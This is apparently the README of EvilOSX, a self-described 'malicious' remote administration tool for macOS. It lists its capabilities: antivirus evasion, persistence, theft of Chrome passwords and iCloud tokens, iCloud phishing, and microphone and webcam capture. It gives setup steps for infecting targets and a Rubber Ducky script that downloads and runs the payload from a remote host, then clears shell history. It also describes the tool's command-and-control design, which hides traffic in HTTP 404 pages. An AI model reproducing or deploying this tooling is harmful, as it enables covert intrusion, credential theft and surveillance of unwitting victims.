EvilOSX - RAT (Remote Administration Tool) for MacOS / OS X

Malicious RAT (remote administration tool) for macOS / OS X.

features

Emulate a terminal instance

Simple extensible module system

No dependencies (pure python)

Not detected by antivirus (encrypted payloads OpenSSL AES-256)

Persistent

Compatibility with GUI and CLI

Recover Chrome passwords

Recover iCloud tokens and contacts

Recover / monitor the clipboard

Recover browser history (Chrome and Safari)

Phish for iCloud passwords through iTunes

ITunes backup (iOS) enumeration

Record the microphone

Take screenshots of a desktop or an image using the webcam

Try to get the root through local privilege escalation

How to use

Normal users
The server side requires python3 to run.
The bot side is written in python2 that is already installed in macOS / OS X.

Once python3 is installed, open a terminal and type the following:

user @ computer: $ # Clone or download this repository 

$ git clone https://github.com/Marten4n6/EvilOSX 

# Install dependencies required by the server 

$ sudo pip3 install -r requirements.txt 

# Go into the repository 

$ cd EvilOSX 

# Start listening for connections 

$ python3 start.py 

# Lastly, run the built launcher (see the builder tab) on your target (s)

Warning: Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.

Advanced users

There is also a command line interface for those who want to use this through SSH:

user @ computer: $ # Create a launcher to infect your target (s) 

$ python3 start.py --builder 

# Start the CLI 

$ python3 start.py --cli --port 1337

EvilOSX - RAT (Remote Administration Tool) for MacOS / OS X

MotivationThis project was created to be used with Rubber Ducky, here is the simple script:

REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/

user @ computer: $ DELAY 1000 

GUI SPACE 

DELAY 500 

STRING Ends 

DELAY 1000 

ENTER 

DELAY 1500 

REM Kill all terminals after x seconds 

STRING screen -dm bash -c 'sleep 6; killall Terminal ' 

ENTER 

STRING cd / tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear 

ENTER

It takes about 10 seconds to install the back door on any unlocked mac, which is ... good.

The terminal is spelled in that way intentionally, in some systems you will not find the terminal in any other way.
To bypass the keyboard configuration wizard, be sure to change the VID and PID that can be found here. The aluminum keyboard (ISO) is probably the one you are looking for.

Versioning

EvilOSX will be maintained under the Semantic Versioning guidelines as much as possible.
Server and bot releases will be numbered with the follow format:

<major>.<minor>.<patch>

And constructed with the following guidelines:

Breaking backward compatibility (with older bots) bumps the major
New additions without breaking backward compatibility bumps the minor
Bug fixes and misc changes bump the patch

For more information on SemVer, please visit https://semver.org/.

Design Notes

Infecting a machine is split up into three parts:
- A launcher is run on the target machine whose only goal is to run the stager
- The stager asks the server for a loader which handles how a payload will be loaded
- The loader is given a uniquely encrypted payload and then sent back to the stager
The server hides it's communications by sending messages hidden in HTTP 404 error pages (from BlackHat's "Hiding In Plain Sight")
- Command requests are retrieved from the server via a GET request
- Command responses are sent to the server via a POST request
Modules take advantage of python's dynamic nature, they are simply sent over the network compressed with zlib, along with any configuration options
Since the bot only communicates with the server and never the other way around, the server has no way of knowing when a bot goes offline